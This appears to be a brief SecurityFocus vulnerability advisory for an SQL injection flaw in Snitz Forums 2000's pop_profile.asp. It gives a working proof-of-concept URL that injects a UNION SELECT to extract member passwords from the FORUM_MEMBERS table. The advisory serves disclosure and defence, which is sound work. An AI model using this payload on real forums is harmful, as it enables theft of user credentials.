Snitz Forums 2000 Pop_Profile.ASP SQL Injection Vulnerability

An attacker can exploit this issue via a web client.

The following proof of concept is available:

http://www.example.com/pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS


 

Privacy Statement
Copyright 2010, SecurityFocus